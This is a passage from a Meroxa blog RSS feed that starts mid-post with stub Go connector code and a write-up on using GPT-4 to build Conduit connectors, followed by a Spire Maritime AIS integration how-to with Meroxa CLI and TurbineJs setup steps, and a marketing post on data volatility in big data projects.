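func (s *Source) Configure(ctx context.Context, cfg map[string]string) error {
    s.config = cfg
    return nil
}

// Open connects to the upstream system and resumes from the given position.
func (s *Source) Open(ctx context.Context, pos sdk.Position) error {
    return nil
}

// Read blocks until the next record is available.
func (s *Source) Read(ctx context.Context) (sdk.Record, error) {
    return sdk.Record{}, nil
}

// Ack is called once a record has been processed end to end.
func (s *Source) Ack(ctx context.Context, pos sdk.Position) error {
    return nil
}

// Teardown releases all resources.
func (s *Source) Teardown(ctx context.Context) error {
    return nil
}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;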
&lt;p&gt;Like magic, GPT-4 generated functional code we were able to use to build connectors. Keep in mind GPT-4 is not flawless. It fell short in cases where the generated code occasionally contained errors due to a lack of context regarding external dependencies, which is sometimes evident in the generated unit tests. While the model typically does a commendable job of rectifying errors with further prompts, developer expertise and intervention are occasionally necessary to address these issues. Keeping that in mind, there are a host of benefits we’ve experienced using GPT-4 such as:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Generating functional Go code for Conduit connector within seconds.&lt;/li&gt;
&lt;li&gt;Receiving guidance on debugging various issues encountered during development.&lt;/li&gt;
&lt;li&gt;Being able to feed it additional prompts to rewrite and optimize functions.&lt;/li&gt;
&lt;li&gt;Streamlining development through efficient struct generation for handling deeply nested responses for various APIs, enabling seamless data integration and pipeline building across multiple platforms.&lt;/li&gt;
&lt;li&gt;Rapidly generating unit tests for input code snippets, which is a significant advantage, as many developers find writing tests tedious.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;To see an example of a connector we built using GPT-4, check out our &lt;a href=&quot;https://meroxa.com/integrations/source/spire-maritime-ais/&quot;&gt;Spire Maritime AIS&lt;/a&gt; source data integration connector. If you’re up for the challenge of using GPT-4 for your development efforts, we urge you to try it out!&lt;/p&gt;
&lt;p&gt;If you’re interested in learning more about Conduit, check out the &lt;a href=&quot;https://www.conduit.io/docs/introduction/getting-started&quot;&gt;Conduit documentation&lt;/a&gt;, the &lt;a href=&quot;https://docs.conduit.io/api/&quot;&gt;Conduit API documentation&lt;/a&gt;, and the &lt;a href=&quot;https://github.com/ConduitIO/conduit-connector-sdk&quot;&gt;Conduit SDK&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Join the discussion on &lt;a href=&quot;https://github.com/ConduitIO/conduit/discussions&quot;&gt;GitHub&lt;/a&gt; or become a part of &lt;a href=&quot;https://discord.meroxa.com/&quot;&gt;our community&lt;/a&gt; to share your experiences in using GPT-4 to tackle your data integration challenges. We&apos;re excited to hear from you!&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Spire Maritime AIS Source Data Integration now Generally Available]]></title><description><![CDATA[The Spire Maritime AIS source data integration is the first of its kind. It works natively with Meroxa's stream processing data platform.]]></description><link>https://meroxa.com/blog/spire-maritime-ais-source</link><guid isPermaLink="false">https://meroxa.com/blog/spire-maritime-ais-source</guid><dc:creator><![CDATA[William Hill]]></dc:creator><pubDate>Wed, 24 May 2023 14:04:43 GMT</pubDate><content:encoded>&lt;p&gt;We are excited to announce general availability of the source data integration with Spire Maritime AIS. Meroxa customers can stream maritime activity from the &lt;strong&gt;Spire Maritime 2.0 GraphQL API&lt;/strong&gt;, transform that data using function code, and deliver it to any downstream destination in real-time.&lt;/p&gt;
&lt;p&gt;This is a first-of-its-kind source data integration with Spire Maritime AIS that works natively with a stream-processing data platform.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;&lt;a href=&quot;https://spire.com/maritime/&quot;&gt;Spire Maritime AIS&lt;/a&gt;&lt;/strong&gt; delivers real-time global maritime activity information by using a constellation of satellites and terrestrial sensors that track and transmit vessel and ship signals to provide their location, routes, and movements.&lt;/p&gt;
&lt;p&gt;Organizations worldwide analyze and process insights from the Spire AIS APIs and TCP stream to help with global logistics, collision avoidance, surveillance, fishery management, and environmental monitoring.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;&lt;a href=&quot;https://meroxa.com/&quot;&gt;Meroxa&lt;/a&gt;&lt;/strong&gt; is a Stream Processing Data Application Platform as a Service that enables developers to build and run stream-processing data applications that respond to real-time data and events while managing all of the underlying infrastructure required to scale stream-processing workloads.&lt;/p&gt;
&lt;p&gt;The Meroxa platform manages the underlying infrastructure required to scale stream-processing data applications and was designed to work natively with our own in-house designed, easy-to-use application framework called Turbine. Turbine enables developers to quickly build using popular programming languages, such as Python, JavaScript, Ruby, and Go, without needing to write domain-specific code.&lt;/p&gt;
&lt;h2&gt;&lt;strong&gt;Getting started with Spire Maritime AIS on Meroxa&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;To stream maritime activity from Spire Maritime AIS on the Meroxa Platform, you must have an existing Spire AIS client account. If you are not already a client and wish to purchase Spire AIS products, you should &lt;a href=&quot;https://spire.com/talk-to-sales/&quot;&gt;contact the Spire AIS team&lt;/a&gt; directly.&lt;/p&gt;
&lt;p&gt;Once you have a unique API token, login to your &lt;a href=&quot;https://auth.meroxa.io/login?state=hKFo2SBVdHNFUFNGLUtoNE4yOVNZSGV5VTZjRDJsRWJoVWJWeaFupWxvZ2luo3RpZNkgQ3loN3NNY2NKSk5EU19RZ3gtQ0c2WDRwZlk4YVRFem6jY2lk2SBUeTJQeUxiZGFoNnBJcVJaaXEzdXhod0Exdmh2ZzZDNg&amp;#x26;client=Ty2PyLbdah6pIqRZiq3uxhwA1vhvg6C6&amp;#x26;protocol=oauth2&amp;#x26;redirect_uri=https%3A%2F%2Fdashboard.meroxa.io%2Fcallback&amp;#x26;audience=https%3A%2F%2Fapi.meroxa.io%2Fv1&amp;#x26;scope=openid+profile+email+user&amp;#x26;response_type=code&amp;#x26;response_mode=query&amp;#x26;nonce=U2dGN3FNTmQtTENaOWYyVm1uTXNlXzNvemFLN08zYTEtMzNjR3E1Q3NCVA%3D%3D&amp;#x26;code_challenge=4kMrf0dlxTltWmY3GwdwQ9F8fCpjCP-m6UG5s8cURi0&amp;#x26;code_challenge_method=S256&amp;#x26;auth0Client=eyJuYW1lIjoiYXV0aDAtc3BhLWpzIiwidmVyc2lvbiI6IjEuMTQuMCJ9&amp;#x26;mode=login&quot;&gt;Meroxa account&lt;/a&gt; and &lt;a href=&quot;https://dashboard.meroxa.io/resources/new?type=spire_maritime_ais&quot;&gt;create a Spire Maritime AIS resource&lt;/a&gt;. Don’t have a Meroxa account? &lt;a href=&quot;https://meetings.hubspot.com/haller/get_started&quot;&gt;Contact us&lt;/a&gt; to get started.&lt;/p&gt;
&lt;h2&gt;&lt;strong&gt;Create a Spire Maritime AIS Resource&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;In order for a Turbine streaming application to securely connect with the &lt;strong&gt;Spire Maritime 2.0 GraphQL API&lt;/strong&gt; as a source, a Resource must be created.&lt;/p&gt;
&lt;p&gt;Resources are used by the Meroxa platform to abstract sensitive credentials away from the Turbine application code. In this section, we’ll guide you through the steps on how to create &lt;strong&gt;Spire Maritime AIS&lt;/strong&gt; Resources.&lt;/p&gt;
&lt;p&gt;As mentioned earlier, we require a unique &lt;strong&gt;Spire Maritime 2.0 GraphQL API token&lt;/strong&gt; to create a Meroxa resource. This can be acquired by contacting a representative at Spire AIS. Once you have received your API token, login to your &lt;a href=&quot;https://auth.meroxa.io/login?state=hKFo2SBVdHNFUFNGLUtoNE4yOVNZSGV5VTZjRDJsRWJoVWJWeaFupWxvZ2luo3RpZNkgQ3loN3NNY2NKSk5EU19RZ3gtQ0c2WDRwZlk4YVRFem6jY2lk2SBUeTJQeUxiZGFoNnBJcVJaaXEzdXhod0Exdmh2ZzZDNg&amp;#x26;client=Ty2PyLbdah6pIqRZiq3uxhwA1vhvg6C6&amp;#x26;protocol=oauth2&amp;#x26;redirect_uri=https%3A%2F%2Fdashboard.meroxa.io%2Fcallback&amp;#x26;audience=https%3A%2F%2Fapi.meroxa.io%2Fv1&amp;#x26;scope=openid+profile+email+user&amp;#x26;response_type=code&amp;#x26;response_mode=query&amp;#x26;nonce=U2dGN3FNTmQtTENaOWYyVm1uTXNlXzNvemFLN08zYTEtMzNjR3E1Q3NCVA%3D%3D&amp;#x26;code_challenge=4kMrf0dlxTltWmY3GwdwQ9F8fCpjCP-m6UG5s8cURi0&amp;#x26;code_challenge_method=S256&amp;#x26;auth0Client=eyJuYW1lIjoiYXV0aDAtc3BhLWpzIiwidmVyc2lvbiI6IjEuMTQuMCJ9&amp;#x26;mode=login&quot;&gt;Meroxa account&lt;/a&gt; and create a &lt;strong&gt;Spire Maritime AIS&lt;/strong&gt; resource in one of two ways:&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Meroxa CLI&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;In the following example, we create a Spire Maritime AIS resource named &lt;strong&gt;my-spire-ais&lt;/strong&gt;. Resource names may contain lowercase letters, numbers, underscores, and hyphens. We recommend that you choose something easy to identify, as this will be used to refer to your Spire Maritime AIS resource when writing your Turbine application code.&lt;/p&gt;
&lt;p&gt;Using the &lt;a href=&quot;https://docs.meroxa.com/cli/installation-guide&quot;&gt;Meroxa CLI&lt;/a&gt;, run the following command:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token output&quot;&gt;meroxa resource create my-spire-ais \
--type spire_maritime_ais \
--token $SPIRE_MARITIME_AIS_API_TOKEN&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Replace the &lt;strong&gt;$SPIRE_MARITIME_AIS_API_TOKEN&lt;/strong&gt; placeholder in the example command above with the API token provided by the Spire AIS team. When you’re ready, simply hit return and wait for confirmation through the Meroxa CLI that the resource has been successfully created.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Meroxa Dashboard&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Below are the steps required to create a Spire Maritime AIS resource using the &lt;a href=&quot;https://dashboard.meroxa.io/resources/new?type=spire_maritime_ais&quot;&gt;Meroxa Dashboard&lt;/a&gt;:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Navigate to the &lt;strong&gt;Resources&lt;/strong&gt; tab.&lt;/li&gt;
&lt;li&gt;Click the &lt;strong&gt;Add a Resource&lt;/strong&gt; button.&lt;/li&gt;
&lt;li&gt;Search for &lt;strong&gt;Spire Maritime AIS&lt;/strong&gt; using the search bar.&lt;/li&gt;
&lt;li&gt;Click the &lt;strong&gt;Add Resource&lt;/strong&gt; button for &lt;strong&gt;Spire Maritime AIS&lt;/strong&gt;.&lt;/li&gt;
&lt;li&gt;Confirm you are on the &lt;strong&gt;Add a resource&lt;/strong&gt; form with &lt;strong&gt;Spire Maritime AIS&lt;/strong&gt; selected.&lt;/li&gt;
&lt;li&gt;Provide a valid &lt;strong&gt;Resource Name&lt;/strong&gt; (e.g., &lt;strong&gt;my-spire-ais&lt;/strong&gt;, &lt;strong&gt;myspire&lt;/strong&gt;, &lt;strong&gt;spire123&lt;/strong&gt;).&lt;/li&gt;
&lt;li&gt;Provide a valid and unique &lt;strong&gt;Spire Maritime AIS API token&lt;/strong&gt;.&lt;/li&gt;
&lt;li&gt;Click the &lt;strong&gt;Save&lt;/strong&gt; button.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Resources can be updated in the Meroxa dashboard by going to the &lt;strong&gt;Resources&lt;/strong&gt; tab and clicking on the &lt;strong&gt;Spire Maritime AIS&lt;/strong&gt; resource you’d like to update.&lt;/p&gt;
&lt;p&gt;We do not display credentials, such as the API token, in any of our interfaces. However, if you need to update the API token at any time, you can do so in the Meroxa Dashboard or the Meroxa CLI.&lt;/p&gt;
&lt;p&gt;A notification in the dashboard will appear once your Spire Maritime AIS resource has been successfully created.&lt;/p&gt;
&lt;h2&gt;&lt;strong&gt;Using Spire Maritime AIS as a Source with Turbine&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;Now that a Spire Maritime AIS resource has been created, you can use the Turbine application framework to stream and transform data in real-time directly from the &lt;strong&gt;Spire Maritime 2.0 GraphQL API&lt;/strong&gt; to any destination. To do this, you must have the Meroxa CLI installed.&lt;/p&gt;
&lt;p&gt;In the following examples, we will demonstrate how to do this with JavaScript using TurbineJs.&lt;/p&gt;
&lt;p&gt;First, initialize a Turbine streaming app by running the following command in the &lt;a href=&quot;https://docs.meroxa.com/cli/installation-guide&quot;&gt;Meroxa CLI&lt;/a&gt;:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token output&quot;&gt;meroxa app init my-spire-app --lang javascript&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;A printed confirmation will let you know when you have successfully initialized your Turbine streaming app, meaning the application project files will be created in your current local directory. You may also include a &lt;strong&gt;--path&lt;/strong&gt; argument at the end of the command to provide an alternative local path.&lt;/p&gt;
&lt;p&gt;Next, run a command to get to the root of the Turbine application project:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token output&quot;&gt;cd my-spire-app&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Within the project directory, you will find an &lt;strong&gt;app.js&lt;/strong&gt; file. Open this with your preferred code editor. There you will see self-documented boilerplate code with a custom function written in JavaScript to execute against the example data record set provided in the fixtures directory.&lt;/p&gt;
&lt;p&gt;To use the Spire Maritime AIS resource, directly pass its name (&lt;strong&gt;my-spire-ais&lt;/strong&gt;) as the only argument to the &lt;strong&gt;resources&lt;/strong&gt; method.&lt;/p&gt;
&lt;p&gt;To represent the source data stream, a &lt;strong&gt;records&lt;/strong&gt; method is used. Because there is no concept of a collection of data with the &lt;strong&gt;Spire Maritime 2.0 GraphQL API&lt;/strong&gt;, simply pass a wildcard string (&lt;strong&gt;&quot;*&quot;&lt;/strong&gt;):&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token output&quot;&gt;exports.App = class App {
  async run(turbine) {
    let source = await turbine.resources(&quot;my-spire-ais&quot;);
    let records = await source.records(&quot;*&quot;);
  }
};&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;That’s all it takes to get real-time maritime data streaming into your Turbine application.&lt;/p&gt;
&lt;p&gt;There are a couple of additional configurations that can be defined in your Turbine application code.&lt;/p&gt;
&lt;h2&gt;&lt;strong&gt;Source Configurations&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;The following source configurations are supported:&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;&lt;strong&gt;Configuration&lt;/strong&gt;&lt;/th&gt;
&lt;th&gt;&lt;strong&gt;Required?&lt;/strong&gt;&lt;/th&gt;
&lt;th&gt;&lt;strong&gt;Example&lt;/strong&gt;&lt;/th&gt;
&lt;th&gt;&lt;strong&gt;Description&lt;/strong&gt;&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;batchSize&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;No, optional. Default is &lt;strong&gt;100&lt;/strong&gt;.&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;100&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Sets the maximum number of results to retrieve from the Spire Maritime 2.0 GraphQL API.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;query&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;No, optional. See Data Record Format for default queried data.&lt;/td&gt;
&lt;td&gt;GraphQL query.&lt;/td&gt;
&lt;td&gt;Send a custom GraphQL query to the Spire Maritime 2.0 GraphQL API.&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;h2&gt;&lt;strong&gt;What’s Next?&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;All that is left is for you to write function code to transform your Spire Maritime AIS stream data and event records to a downstream set of data stores, databases, or third-party APIs. Imagine what you can do with the power of Spire Maritime AIS at your fingertips.&lt;/p&gt;
&lt;p&gt;Need potential ideas for Turbine streaming apps? Check out our example &lt;a href=&quot;https://github.com/meroxa/turbine-examples&quot;&gt;Turbine app examples&lt;/a&gt; to get started. But don’t let these examples hinder you. There is no limit to what you and your team can achieve using Spire Maritime AIS and the power of the Meroxa platform.&lt;/p&gt;
&lt;p&gt;We can’t wait to see what you build! 🚀&lt;/p&gt;
&lt;p&gt;As always, if you need help, have questions, or just want to chat:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Don’t have a Meroxa account? &lt;a href=&quot;https://meetings.hubspot.com/haller/get_started&quot;&gt;Schedule an onboarding session&lt;/a&gt; with our team.&lt;/li&gt;
&lt;li&gt;Have a technical question? Reach out via email at &lt;a href=&quot;mailto:support@meroxa.com&quot;&gt;support@meroxa.com&lt;/a&gt;.&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://discord.meroxa.com/&quot;&gt;Join our Discord&lt;/a&gt; community.&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://twitter.com/meroxadata&quot;&gt;Follow us&lt;/a&gt; on Twitter.&lt;/li&gt;
&lt;/ul&gt;</content:encoded></item><item><title><![CDATA[Is Volatility “swamping” Your Data Discovery?]]></title><description><![CDATA[Meroxa enables big data projects to evolve with business needs and address data volatility challenges.]]></description><link>https://meroxa.com/blog/data-volatility</link><guid isPermaLink="false">https://meroxa.com/blog/data-volatility</guid><dc:creator><![CDATA[Keith Haller]]></dc:creator><pubDate>Tue, 16 May 2023 21:18:06 GMT</pubDate><content:encoded>&lt;p&gt;Data volatility is a significant challenge that organizations face when dealing with big data. The traditional Vs of big data (Volume, Velocity, and Variety) fail to capture the impact that volatility has on the success of big data projects. Volatility refers to data whose value fluctuates over time, making it challenging to identify, store, and process. Volatility demands discovery, and discovery drives the long-term health of big data efforts.&lt;/p&gt;
&lt;p&gt;In this blog post, we discuss the significance of volatility and how it impacts the overall success of big data projects. We explain how managing data volatility effectively can pave the way for a more adaptive data environment that unlocks the true potential of your volatile data.&lt;/p&gt;
&lt;p&gt;To achieve this, organizations need to rethink their approach to data discovery. By empowering data stakeholders with development best practices and tooling, businesses can draw better business conclusions from their volatile data. We identify the key requirements for an effective data discovery strategy, including the need for AI-driven, open-source connectors, a code-first approach using established development best practices, and an efficient local testing solution.&lt;/p&gt;
&lt;h2&gt;The Big “Big Data” Problem&lt;/h2&gt;
&lt;p&gt;Big data efforts fail 85% of the time. In fact, it is well documented that 70-80% of small-data projects (data warehouses) also failed. The reason for these high failure rates lies in their shared platform-led approach to optimization and neglect of discovery. That narrow focus hampered their ability to remain relevant and up-to-date. As a result, big data lakes turned into swamps, and small data warehouses lost their reliability.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Source:&lt;/strong&gt; &lt;a href=&quot;https://designingforanalytics.com/resources/failure-rates-for-analytics-bi-iot-and-big-data-projects-85-yikes/&quot;&gt;https://designingforanalytics.com/resources/failure-rates-for-analytics-bi-iot-and-big-data-projects-85-yikes/&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;The crux of the problem is that these efforts do not foster effective discovery processes driven by developers. Instead, they adopt a platform-led discovery approach that introduces significant delays and prevents developers from adequately supporting the discovery process. Consequently, these big data initiatives are unable to adapt and meet the evolving needs of the business.&lt;/p&gt;
&lt;p&gt;The fact that big data is big is a challenge. A platform-led approach is very good at optimizing the performance of known challenges using known data. However, solving known performance challenges is not why data lakes turn into swamps or why they continue to fail at an 85% rate. They fail because they do not enable developer-led discovery to keep the data relevant and current to the needs of the business.&lt;/p&gt;
&lt;p&gt;💡 For example, a popular ride-sharing company managed over 100 petabytes of data, including trips, customer preferences, location details, and driver information. As the volume and velocity of data increased, the company had to build a system that required significant investment in resources and infrastructure, highlighting the complexities of managing and leveraging massive amounts of data. &lt;strong&gt;Source:&lt;/strong&gt; &lt;a href=&quot;https://www.uber.com/en-CA/blog/uber-big-data-platform/&quot;&gt;https://www.uber.com/en-CA/blog/uber-big-data-platform/&lt;/a&gt;&lt;/p&gt;
&lt;h2&gt;Why is Volatility the most important V?&lt;/h2&gt;
&lt;p&gt;Big data has traditionally been defined by the 3Vs. The 85% failure rate of Data Lake projects can be explained by the missing fourth V: volatility. Volatility refers to data whose value is indeterminate and changes quickly. Volatility considers changes in business objectives in real-time and how the value of data fluctuates depending on the current needs of the business.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://20285798.fs1.hubspotusercontent-na1.net/hubfs/20285798/3%20Vs%20Diagram_Volatility%20Blog%20Post.png&quot; alt=&quot;3 Vs Diagram_Volatility Blog Post&quot;&gt;&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://20285798.fs1.hubspotusercontent-na1.net/hubfs/20285798/4%20Vs%20Diagram_Volatility%20Blog%20Post..png&quot; alt=&quot;4 Vs Diagram_Volatility Blog Post.&quot;&gt;&lt;/p&gt;
&lt;p&gt;Volatility impacts the original 3Vs in the following ways:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Volume: Volatility in which data is worth storing can result in swamps of unused data and can prevent discovery when potentially impactful data is left out.&lt;/li&gt;
&lt;li&gt;Velocity: Volatility in the latency the business requires can compound volume and performance problems.&lt;/li&gt;
&lt;li&gt;Variety: Volatility in data types and needed connectors complicates identifying valuable data, integrating new sources, and maintaining effective data management systems.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;In short, Volatility is the most important because your data stores can’t evolve to meet the needs of your business unless you properly handle volatility and its impact on discovery.&lt;/p&gt;
&lt;h2&gt;&lt;strong&gt;Rethinking the Approach to Volatile Data Discovery&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;Challenges such as technology complexity and poorly defined business objectives make data discovery a daunting task. Coupled with rapidly evolving business conditions and the inherent volatility of data, organizations often struggle to discover insights from their data. Although companies can execute data discovery projects, these efforts often come at a significant cost in terms of resources, system expertise, and long timelines. Even with such investments, businesses may still fail to achieve meaningful conclusions due to the constantly changing nature of business.&lt;/p&gt;
&lt;p&gt;Addressing these challenges requires a new approach to data discovery that empowers data stakeholders with development best practices and tooling. By placing data stakeholders as the lead for discovery, they can draw better business conclusions from their volatile data.&lt;/p&gt;
&lt;h2&gt;&lt;strong&gt;Embracing an Effective Developer-led Discovery Strategy&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;The right tooling to embrace an effective data discovery strategy should offer the following:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Put the data stakeholders closest to the data&lt;/li&gt;
&lt;li&gt;Remove the need for expertise in complex data technologies&lt;/li&gt;
&lt;li&gt;A fast, AI-driven, open-source, cross-platform approach for building connectors:
&lt;ul&gt;
&lt;li&gt;Connectors should be built quickly to support discovery.&lt;/li&gt;
&lt;li&gt;Open source connectors enable sharing not only within a single department or platform but also benefit the enterprise.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;A code-first approach using established development best practices:
&lt;ul&gt;
&lt;li&gt;Leverages developers&apos; existing expertise in specific programming languages.&lt;/li&gt;
&lt;li&gt;Enables developers to efficiently utilize familiar tools and frameworks.&lt;/li&gt;
&lt;li&gt;Encourages custom solutions, collaborations, and integrates into existing workflows&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;An efficient and cost-effective local testing solution:
&lt;ul&gt;
&lt;li&gt;Rapid iterations enable stakeholders to respond to changing business requirements.&lt;/li&gt;
&lt;li&gt;Allows safe experimentation with new data of uncertain value in an isolated environment without affecting the main system or incurring significant storage costs.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;The right tool should answer questions like, &quot;What data should I collect now?&quot; and &quot;Why should I collect this data?&quot; without being cost-prohibitive or resource intensive.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;&lt;strong&gt;Addressing Data Volatility &amp;#x26; Discovery with Meroxa&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;Having explored the significance of data volatility and the necessity for a developer-led approach, it becomes clear that organizations need a solution that caters to these requirements. Meroxa is that solution. Designed to address the challenges of data volatility, Meroxa empowers developers to take control of their data discovery.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://20285798.fs1.hubspotusercontent-na1.net/hubfs/20285798/Before%20Meroxa%20Diagram_Volatility%20Blog%20Post%20.png&quot; alt=&quot;Before Meroxa Diagram_Volatility Blog Post&quot;&gt;&lt;/p&gt;
&lt;p&gt;Meroxa offers a vendor-neutral, developer-led, open-source, code-first approach that integrates well into any existing infrastructure.&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Programming Language and Connector Neutral&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Meroxa&apos;s programming language and connector neutral approach empowers developers to maintain optimal productivity. By providing connectors for a wide range of data stores, such as databases, cloud platforms, SaaS applications, APIs, data lakes, and messaging systems, Meroxa enables seamless integration and flexibility, catering to diverse needs in the ever-evolving technological landscape.&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Developer Led&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;In order to increase velocity and reduce time to value of new data products and initiatives, the Meroxa platform supports a developer-led, self-service approach. Once resources (such as databases and APIs) have been onboarded to the platform, they are made available for use via friendly names, with all unnecessary implementation details abstracted away.&lt;/p&gt;
&lt;p&gt;This significantly reduces complexity by removing the need for deep knowledge of every resource type and improves flexibility as swapping resources is a matter of changing the reference. Developers can typically deploy fully functioning, production grade pipelines within hours.&lt;/p&gt;
&lt;p&gt;Granular resource-specific security can be passed through the platform by applying security controls on the resource (taking advantage of the full fidelity of permissions and controls) and then registering associated credentials with the platform. Credentials are never displayed to the end user fully abstracting access.&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Open Source&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Meroxa embraces open-source principles to encourage collaboration and innovation within and beyond enterprises. Developers can build connectors faster with Meroxa&apos;s AI-driven method, and connectors are based on data stakeholder demands and actual use cases, rather than being dictated by platform providers&apos; assumptions about what is needed.&lt;/p&gt;
&lt;p&gt;Meroxa&apos;s open-source connectors are designed for rapid deployment, allowing developers to quickly and efficiently access a wide variety of data sources. By embracing the power of collaboration and developer-driven innovation, organizations can unlock the true potential of their data and drive innovation like never before.&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Code-First&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;The Meroxa Turbine toolchain delivers a rich local development experience, allowing for a rapid, tight feedback loop. It builds on decades of software engineering processes and workflows, providing a familiar and robust developer experience. Developers build stream processing applications and pipelines using their favorite programming languages. They can leverage the wealth of existing libraries and packages in those languages.&lt;/p&gt;
&lt;p&gt;One of the key features offered by Meroxa is local testing. Local testing creates a safe, isolated environment for developers to experiment with new data, test its value, and explore its potential uses without affecting the main system or incurring significant storage costs, empowering developers to innovate freely.&lt;/p&gt;
&lt;p&gt;Organizations can also extend their software development processes and workflows to encapsulate data engineering with native support for Git, seamlessly integrating data operations into the established software development life cycle.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://20285798.fs1.hubspotusercontent-na1.net/hubfs/20285798/After%20Meroxa%20Developer-led_Volatility%20Blog%20Post.png&quot; alt=&quot;After Meroxa Developer-led_Volatility Blog Post&quot;&gt;&lt;/p&gt;
&lt;h2&gt;&lt;strong&gt;Conclusion&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;On a final note, reducing the time it takes to build data solutions is crucial for businesses to stay agile and competitive in today&apos;s fast-paced environment. Meroxa&apos;s developer-led approach empowers developers to take charge, streamlining the process and enabling quicker responses to evolving business needs. By shifting focus from platform-led optimization of data-driven projects to developer-led discovery, companies can enable their big data projects to evolve with the needs of the business. In essence, Meroxa&apos;s developer-led paradigm has the potential to guarantee success for your big data project in a world that has forever suffered from an 85% failure rate.&lt;/p&gt;
&lt;p&gt;Don&apos;t let data volatility swamp your big data efforts. Don’t be part of the 85% failure rate of big data projects. To get in touch and see how Meroxa can help transform your data strategy, reach out to us by joining our &lt;a href=&quot;https://discord.com/invite/pN24QPca6b&quot;&gt;community&lt;/a&gt; or by writing to &lt;a href=&quot;mailto:info@meroxa.com&quot;&gt;info@meroxa.com&lt;/a&gt;.&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Turbine + Self-Hosted Environments: Data Isolation For Streaming Apps]]></title><description><![CDATA[Choosing between speed and compliance is hard. Meroxa eliminates implementation complexity while still offering complete control of your data.]]></description><link>https://meroxa.com/blog/turbine-self-hosted-environments</link><guid isPermaLink="false">https://meroxa.com/blog/turbine-self-hosted-environments</guid><dc:creator><![CDATA[Jennifer Hudiono]]></dc:creator><pubDate>Tue, 09 May 2023 13:32:05 GMT</pubDate><content:encoded>&lt;p&gt;Today, we’re excited to announce Turbine support within Self-Hosted Environments. Software developers can now build and deploy Turbine data applications in Self Hosted Environments.&lt;/p&gt;
